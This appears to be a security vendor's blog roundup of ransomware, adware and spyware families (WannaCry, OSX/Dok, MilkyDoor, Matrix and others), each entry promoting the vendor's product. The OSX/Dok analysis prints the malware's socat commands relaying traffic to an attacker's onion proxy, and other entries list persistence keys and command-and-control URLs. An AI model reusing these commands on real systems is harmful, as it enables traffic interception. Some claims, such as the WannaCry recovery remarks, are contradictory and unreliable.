May Ransomware

Month of May we saw a new Ransomware called May Ransomware. Once infiltrated, May encrypts various data using AES-256 and RSA-4096 encryption algorithms and appends filenames with the “.locked” extension (for example, “sample.jpg” is renamed to “sample.jpg.locked”). May then creates a text file (“Restore_your_files.txt”) containing a ransom-demand message and places it in each folder containing encrypted files.

The message informs victims of the encryption and make ransom demands of 1 Bitcoin (approximately, $1750) in exchange for file decryption. As mentioned above, May employs AES and RSA cryptographies and, therefore, decryption without unique keys is impossible. All of the files that get encrypted will receive the same extension appended to them, and that is the ‘.maysomware’ and ‘.locked’ extension.

The criminals provide each of their victims with a personal identification number. Presumably, the hackers keep all the ID’s in some sort of database next to the unique data decryption keys. That’s why the victims are asked to submit this number along with the payment. Nevertheless, this does not mean that you should. On the opposite, you should avoid getting involved in any type of collaboration with the criminals and take all measures possible to remove May virus from your computer.

You should keep an updated Anti Virus program such as Max Total Security which provides daily back and easy to restore mechanism in case you get infected with any of the Ransomware.

Google Play Apps Found Serving Adware

Dozens of applications available on Google Play were found delivering a strain of adware capable of collecting users’ personal information.
With these apps installed, users will have a full screen advertisement popping up at regular intervals even when the app is closed. For example:
adware-popup
The program then downloads another .dex file from cloud.api-restlet.com, which collects the following information from the user’s device:

Email address for Google account
List of apps installed
IMEI identifier and android_id
Screen resolution
Manufacturer, model, brand, OS version
SIM operator
App installation source

To avoid detection, researchers also found XavirAd to use encrypted strings. Each class has its own decryption routine in the class constructor, and although the algorithm remains the same, the keys are different in each class.

Furthermore, the XavirAd library uses anti-sandbox technology to hide from dynamic analysis, stopping malicious behaviors once it detects it is running in a testing environment. It also checks the user’s email address for another safety net that it’s not run by a tester. If the email address contains the following strings, it will stop the action:
The following Google Play apps contain XavirAd, and users may want to avoid them:
apps-used-on-google-play

WanaCry Ransomware

WanaCrypt, or also known as WanaCry, is a new ransomware that wreaked havoc across the world last night, which spreads like a worm by leveraging a Windows SMB vulnerability (MS17-010) that has been previously fixed by Microsoft in March. In these attacks, data is encrypted with the extension “.WCRY” added to the filenames. “WannaCry”, is initiated through an SMBv2 remote code execution in Microsoft Windows. This exploit (codenamed “EternalBlue”) has been made available on the internet through the Shadowbrokers dump on April 14th, 2017 and patched by Microsoft on March 14.

Unfortunately, it appears that many organizations have not yet installed the patch.

In the wake of the largest ransomware attack in the history that had already infected over 114,000 Windows systems worldwide since last 24 hours, Microsoft just took an unusual step to protect its customers with out-of-date computers. Microsoft has just released an emergency security patch update for all its unsupported version of Windows, including Windows XP, Vista, Windows 8, Server 2003 and 2008 Editions. Download vulnerability patch from here https://technet.microsoft.com/en-us/library/security/ms17-010.aspx .

People already infected with this ransomware will not get their files back. It means that no new infections will occur with yesterday’s strain. Currently, there’s no known method of breaking the ransomware’s encryption. The only viable method of getting files back at the moment is from previous operating system backups, and by paying the ransom note, as a last resort. We recommend using Max Total Security which can help you restore your file from daily back up module, Tools>Max Backup Utility. It can also detect and terminate this Ransomware from spreading further on your PC.

Max Total Security also has a newly introduced module in its tools treasure. Tools>Max Application Whitelist , this module allows you to completely protect your PC from any unauthorized, not welcome executables. In a normal day to day operation you know which programs you are going to use on your PC so just go to this tool and allow those applications whicih run from program file folder. System executables are already taken care off. From now onward , no other executable will be allowed to run on your PC, completely protecting it from any types of Trojans.

Amnesia ransomware

The Amnesia Ransomware is used to take the victims’ files hostage. Ransomware Trojans like the Amnesia Ransomware are designed to encrypt the victim’s files using a strong encryption algorithm. It encrypts victim’s files and refrains from accessing their sensitive and other personal files. It alters the names of all encrypted files with .amnesia extension. Then attacker demands a ransom in exchange for file decryption.
The files encrypted in the Amnesia Ransomware attack will no longer be readable and may show up as blank icons in the Windows Explorer. The Amnesia Ransomware targets a wide variety of files, generally looking for user generated files that may include spreadsheets, text documents, images, videos, music files, databases, etc. The Amnesia Ransomware delivers its ransom note in the form of a text file named ‘HOW TO RECOVER ENCRYPTED FILES.TXT.’ This file alerts the victim of the attack and demands the payment of a ransom to recover the infected files. The full text of the Amnesia Ransomware ransom note:

‘YOUR FILES ARE ENCRYPTED!
Your personal ID:
[RANDOM CHRACTERS]
Attention! What happened?
Your documents, databases and other important data has been encrypted.
If you want to restore files send an email to: s1an1er111@protonmail.com
In a letter to indicate your personal identifier (see in the beginning of this document).
Attention!
* Do not attempt to remove the program or run the anti-virus tools.
* Attempts to self-decrypting files will result in the loss of your data.
* Decoders are not compatible with other users of your data, because each user’s unique encryption key.’

The best protection against the Amnesia Ransomware and similar ransomware threats is to have backups of all files on an independent memory device or the cloud, as well as a reliable security program like Max Total Security that is fully up-to-date and capable of intercepting the Amnesia Ransomware and similar threat attacks before they can start infection.

Mikoyan ransomware

The infection process of .MIKOYAN ransomware is very similar to other ransomware infections out there. The malware may take advantage of massive spam campaigns that redistribute malicious attachments as well web links that lead to the download of the infection files. Such e-mails are cleverly orchestrated in a manner that aims to convince users to open the attachment.

mikoyan-ransomware
Besides via e-mail, the .MIKOYAN ransomware virus may also be replicated via multiple other methods such as:

Exploit kits.
Via a previous infection with a botnet or a Trojan.
Through fake installers, flash player updates or other setup wizards.
Via a fake key generators or license activators uploaded on torrent websites.

Once this ransomware infection has already become active on a computer, the .MIKOYAN virus drops it’s malicious payload files. They are often located in the following Windows directories:

%Common%
%AppData%
%LocalLow%
%Local%
%Roaming%
Besides the main executable of the MIKOYAN ransomware, named MIKOYAN.exe, the virus may also drop other malicious files that exist under different names, often randomly generated ones. After the encryption process has completed, the ransomware sets a .MIKOYAN file extension to the files encrypted by it.

To run on startup, the MIKOYAN ransomware may also modify the Windows Registry editor, more specifically the Run and RunOnce registry keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

Like always we recommend that you keep an updated copy of Max Total Security on your PC which can restore your files from the daily built in back up. Also, 24×7 free support can help you with any issues. You can get it from here Max Total Security.

XPan Ransomware

The XPan Ransomware is being used to target small and medium businesses located in Brazil (although there is nothing limiting these attacks only to Brazil since these threat attacks can target computers anywhere). Taking advantage of remote desktop connections protected poorly is carrying out the XPan Ransomware attacks. Exploiting poor password protection and security measures, con artists can install the XPan Ransomware on the victims’ computers, as well as carry out other threatening operations.

The ransomware, suspected to be distributed by a group of small-time cybercriminals has already affected many computers belonging to small and medium businesses in the country. The similarities between XPan and .one ransomware was found during an in-depth analysis of the malicious program. The similarities include the target file extensions, ransom note, commands executed before and after the encryption process and even the public RSA keys of the criminals.

For each target file the malware generates a new unique 255-byte random string S (which contains the substring “NMoreira”), turns it into a 256-bit key using the API CryptDeriveKey, and proceeds to encrypt the file contain using AES-256 in CBC mode with zero IV. According to one of the victims, criminals were asking for 0.3 bitcoin to provide the recovery key, using the same approach as they did with before: the user sends a message to a mailbox with his unique ID and patiently awaits for further instructions.

OSX Malware – Dok

People often assume that if you’re running OSX, you’re relatively safe from malware. But this is becoming less and less true, as evidenced by a new strain of malware encountered by the Check Point malware research team. This new malware – dubbed OSX/Dok — affects all versions of OSX.

This is the first “major scale” malware directed at Mac owners through a “coordinated email phishing campaign.” The emails are aimed mostly at Europeans, one example being a German-language message from a supposed Swiss official, claiming problems with the target’s tax return.

The malware works by gaining administration privileges in order to install a new root certificate on the user’s system. This enables it to gain access to all communications between the host Mac and the internet, including traffic flowing through connections encrypted with SSL.
Dok
The malware later presents the user with a security message claiming an update is available for the system, for which a password input is required. Following the “update”, the malware gains complete control of admin privileges, adjusts the network settings to divert all outgoing connections through a proxy, and installs additional tools that enable it to perform a man-in-the-middle attack on all traffic.

The malware bundle is contained in a .zip archive named Dokument.zip. It was signed on April 21th 2017 by a “Seven Muller” and the bundle name is Truesteer.AppStore.

Upon execution, the malware will copy itself to the /Users/Shared/ folder, and will then proceed to execute itself from the new location by running the shell commands below:

chmod +x /Users/Shared/AppStore.app …gives all users execute permission
rm -fr “/Users/_%USER%_/Downloads/Dokument.app”…delete the original copy
“/Users/Shared/Appstore.app/Contents/MacOS/AppStore”Dokument…exceute the application

The malware will also install 2 LaunchAgents that will start with system boot, and have the following names:

/Users/_%User%_/Library/LaunchAgents/com.apple.Safari.proxy.plist

/Users/_%User%_/Library/LaunchAgents/com.apple.Safari.pac.plist

These LaunchAgents will redirect requests to 127.0.0.1 through the dark web address “paoyu7gub72lykuk.onion”. This is necessary for the previous PAC configuration to work (note that the original configuration looks for the PAC file on the local host 127.0.0.1).

These launchAgents consist of the following BASH commands:

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:5588,socksport=9050

As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim’s traffic and tamper with it in any way they please.

Beware of emails attachments, do not enter your root password when asked by any app. Also, keep an updated copy of Mac Total Security by Max Secure Software.

MilkyDoor Android Malware

A newly discovered Android malware called MilkyDoor turns mobile devices into “walking backdoors” that give attackers access to whatever network an infected user is connected to. Affected phones essentially act as proxy servers that link legitimate networks with malicious command-and-control servers via Socket Secure (SOCKS) protocol, allowing bad actors to exfiltrate data.

It uses remote port forwarding via Secure Shell (SSH) tunnels to hide malicious traffic and grant attackers access to firewall-protected networks. The malware was recently found in over 200 Android applications available through the Play Store. Google has removed them from their official app store.

In total, researchers estimate the apps had between 500,000 and 1 million installs only through the Play Store alone.
While MilkyDoor appears to be DressCode’s successor, MilkyDoor adds a few malicious tricks of its own. Among them are its more clandestine routines that enable it to bypass security restrictions and conceal its malicious activities within normal network traffic. It does so by using remote port forwarding via Secure Shell (SSH) tunnel through the commonly used Port 22. The abuse of SSH helps the malware encrypt malicious traffic and payloads, which makes detection of the malware trickier.

We found these Trojanized apps masquerading as recreational applications ranging from style guides and books for children to Doodle applications. We surmise that these are legitimate apps which cybercriminals repackaged and Trojanized then republished in Google Play, banking on their popularity to draw victims.

MilkyDoor poses greater risk to businesses due to how it’s coded to attack an enterprise’s internal networks, private servers, and ultimately, corporate assets and data. The way MilkyDoor builds an SSH tunnel presents security challenges for an organization’s network, particularly in networks that integrate BYOD devices. Its stealth lies in how the infected apps themselves don’t have sensitive permissions and consequently exist within the device using regular or seemingly benign communication behavior.

The repercussions are also significant. MilkyDoor can covertly grant attackers direct access to a variety of an enterprise’s services—from web and FTP to SMTP in the internal network. The access can then be leveraged to poll internal IP addresses in order to scan for available—and vulnerable—servers. The recent spate of compromises in MongoDB and ElasticSearch databases, where their owners were also extorted, are a case in point. The servers were public, which is exacerbated by the lack of authentication mechanisms in its internal databases.

End users and enterprises can benefit from mobile total security solution, Max Total Security available on Google Play.

SMSVova Spyware -Android

SMS-based Spyware, which can steal and relay a victim’s location to an attacker in real time, was downloaded between 1 and 5 million times before being pulled from Google’s official U.S. Play Store. On the Play Store, the app was titled “System Update,” suggesting that users who download it would receive the latest Android release.

The malware, called SMSVova, is capable of pinpointing a user’s exact geolocation and then sending that data to an attacker. However, upon installing and opening SMSVova, the app immediately quits, delivering the following message: “Unfortunately, Update Service has stopped.” The app then hides itself from the main screen.

At this point, the app enables a MyLocationService feature that tracks a user’s last known location. It also scans for SMS message commands, which the attacker sends in order to adjust malware settings and ultimately request a user’s device location. The attacker can even specifically ask to receive a location alert when the victim’s battery is running low.

smsvova

Despite the error message, the spyware sets up an Android service and broadcast receiver:

MyLocationService: Fetches last known location
IncomingSMS (Receiver): Scans for incoming SMS messages

MyLocationService is to fetch the user’s last known location and set it up in Shared Preferences. Shared Preferences is one of the many ways Android stores an application’s data.
IncomingSMS is designed to look for incoming SMS messages with a particular syntax, in which the message should be more than 23 characters and should contain “vova-” in the SMS body. It also scans for a message containing “get faq.”

matrix9643@yahoo.com ransomware

Matrix virus, alternatively called as matrix9643@yahoo.com ransomware, functions as a crypto-Trojan. Matrix Ransomware has the worm like features that allow it to spread outside of the originally infected machine via Windows shortcuts. This malware appends “.matrix” or “.b10cked” extension to the name of every encrypted file. For instance, “sample.jpg” is renamed to “sample.jpg.matrix”. Following successful encryption, Matrix creates a text file “matrix-readme.rtf” (newer variants drop “Readme-Matrix.rtf” fileor “WhatHappenedWithMyFiles.rtf”) and places it in every folder containing ransom demanding message.

matrix-ransom-note

while performing the encryption, Matrix will hide a folder and then create a shortcut with the same name. It will then make a copy of the ransomware executable and save it as desktop.ini in the original:

matrix1
Clicking on any shortcut will launch the malware program.

Files associated with the Matrix Ransomware:
%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[random].hta
%UserProfile%\AppData\Roaming\[victim_id].pek
%UserProfile%\AppData\Roaming\[victim_id].sek
%UserProfile%\AppData\Roaming\errlog.txt
%UserProfile%\AppData\Roaming\[random].cmd
%UserProfile%\AppData\Roaming\[random].afn
%UserProfile%\AppData\Roaming\[random].ast
%UserProfile%\AppData\Roaming\[random].hta
matrix-readme.rtf
Bl0cked-ReadMe.rtf
WhatHappenedWithFiles.rtf

Network Communication:
stat3.s76.r53.com.ua/addrecord.php
stat3.s76.r53.com.ua/uploadextlist.php

With increase in everyday Ransomware activity, users are highly recommended to back up the files on daily basis to minimize loss of data and use a good anti virus program such Max Total Security which can take daily backup with highly configuration options for users.